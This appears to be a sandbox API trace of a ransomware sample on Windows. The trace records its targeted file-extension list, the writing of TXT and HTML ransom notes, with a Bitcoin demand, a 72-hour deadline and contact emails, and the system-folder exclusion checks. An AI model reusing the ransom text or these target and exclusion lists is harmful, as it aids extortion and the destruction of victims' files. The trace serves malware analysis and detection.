rch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".avi") returned 0x0
	[0201.487] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x869921c0, ftCreationTime.dwHighDateTime=0x1d971a7, ftLastAccessTime.dwLowDateTime=0xd654b460, ftLastAccessTime.dwHighDateTime=0x1d972db, ftLastWriteTime.dwLowDateTime=0xd654b460, ftLastWriteTime.dwHighDateTime=0x1d972db, nFileSizeHigh=0x0, nFileSizeLow=0x2b83, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="ij1_ g0KO.avi", cAlternateFileName="IJ1_G0~1.AVI")) returned 0
	[0201.488] FindClose (in: hFindFile=0xfb9470 | out: hFindFile=0xfb9470) returned 1
	[0201.490] FindClose (in: hFindFile=0xfb9470 | out: hFindFile=0xfb9470) returned 0
	[0201.490] lstrcpyW (in: lpString1=0x187644, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym"
	[0201.491] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\*.*"
	[0201.491] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.491] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.491] wsprintfW (in: param_1=0x186f30, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\HELP_DECRYPT_YOUR_FILES.TXT") returned 147
	[0201.491] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ac
	[0201.492] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0201.492] WriteFile (in: hFile=0x3ac, lpBuffer=0x1862e8*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18720c, lpOverlapped=0x0 | out: lpBuffer=0x1862e8*, lpNumberOfBytesWritten=0x18720c*=0xc46, lpOverlapped=0x0) returned 1
	[0201.495] CloseHandle (hObject=0x3ac) returned 1
	[0201.495] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1862b8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1862b8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.495] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.495] GetUserNameA (in: lpBuffer=0x18619c, pcbBuffer=0x1862b4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1862b4) returned 1
	[0201.497] wsprintfW (in: param_1=0x187138, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0201.497] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ac
	[0201.497] SetFilePointer (in: hFile=0x3ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0201.497] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0201.497] WriteFile (in: hFile=0x3ac, lpBuffer=0x187138*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x187214, lpOverlapped=0x0 | out: lpBuffer=0x187138*, lpNumberOfBytesWritten=0x187214*=0x30, lpOverlapped=0x0) returned 1
	[0201.497] CloseHandle (hObject=0x3ac) returned 1
	[0201.498] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.498] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.498] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0201.498] wsprintfW (in: param_1=0x186ef0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\HELP_DECRYPT_YOUR_FILES.HTML") returned 148
	[0201.498] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ac
	[0201.500] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0201.500] WriteFile (in: hFile=0x3ac, lpBuffer=0x1866e4*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x187208, lpOverlapped=0x0 | out: lpBuffer=0x1866e4*, lpNumberOfBytesWritten=0x187208*=0x808, lpOverlapped=0x0) returned 1
	[0201.504] CloseHandle (hObject=0x3ac) returned 1
	[0201.504] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.504] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1866cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1866cc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.505] GetUserNameA (in: lpBuffer=0x1865b0, pcbBuffer=0x1866c8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1866c8) returned 1
	[0201.527] wsprintfA (in: param_1=0x1870f8, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0201.527] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ac
	[0201.527] SetFilePointer (in: hFile=0x3ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0201.527] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0201.528] WriteFile (in: hFile=0x3ac, lpBuffer=0x1870f8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x187210, lpOverlapped=0x0 | out: lpBuffer=0x1870f8*, lpNumberOfBytesWritten=0x187210*=0x43, lpOverlapped=0x0) returned 1
	[0201.528] CloseHandle (hObject=0x3ac) returned 1
	[0201.528] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*"), lpFindFileData=0x187a54 | out: lpFindFileData=0x187a54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18f3e1c0, ftCreationTime.dwHighDateTime=0x1d973a3, ftLastAccessTime.dwLowDateTime=0x919ebc00, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x91a12080, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName=".", cAlternateFileName="")) returned 0xfb95f0
	[0201.528] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\*.*") returned 123
	[0201.529] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.529] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\wu9RMPx3T2rmzF3qVbg\\cbrqJym\\*.*", cchLength=0x7b | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*") returned 0x7b
	[0201.529] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.529] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="windows") returned 0x0
	[0201.529] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.529] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="boot") returned 0x0
	[0201.529] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.530] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="system volume information") returned 0x0
	[0201.530] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.530] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0201.530] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.530] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="temp") returned 0x0
	[0201.530] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.530] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="program files") returned 0x0
	[0201.530] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.531] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="program files (x86)") returned 0x0
	[0201.531] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.531] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="appdata") returned 0x0
	[0201.531] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.531] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="application data") returned 0x0
	[0201.531] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.531] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="winnt") returned 0x0
	[0201.531] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.532] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="tmp") returned 0x0
	[0201.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.532] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="cache") returned 0x0
	[0201.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.532] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="temporary internet files") returned 0x0
	[0201.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.532] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="webcache") returned 0x0
	[0201.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.533] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="inetcache") returned 0x0
	[0201.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.534] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="nvidia") returned 0x0
	[0201.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.534] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="packages") returned 0x0
	[0201.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.534] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\wu9rmpx3t2rmzf3qvbg\\cbrqjym\\*.*", lpSrch="cookies") returned 0x0
	[0201.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
